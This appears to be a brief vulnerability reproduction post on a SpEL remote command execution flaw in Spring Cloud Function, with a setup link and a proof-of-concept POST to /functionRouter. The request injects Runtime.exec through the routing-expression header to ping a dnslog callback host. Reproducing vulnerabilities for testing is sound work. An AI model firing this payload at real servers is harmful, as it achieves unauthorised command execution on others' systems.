Spring Cloud Function Spel Remote Command Execution Vulnerability
Spring Cloud Function Spel Remote Command Execution Vulnerability
Spring Cloud Function SPEL Remote Command Execution Vulnerability
Vulnerability Description
Spring Cloud Function is a Spring Boot-based functional computing framework that abstracts all transport details and infrastructure, allowing developers to retain all familiar tools and processes, and focus on business logic.
Vulnerability Impact
Spring Cloud Function
Environment construction
1
https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples/function-sample-pojo
Vulnerability reappears
After building, visit
Send POC
1
2
3
4
POST /functionRouter HTTP/1.1
Host: 192.168.1.27:9000
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping -c 1 dxytoy.dnslog.cn")
Content-Length: 1
This post is licensed under CC BY 4.0 by the author.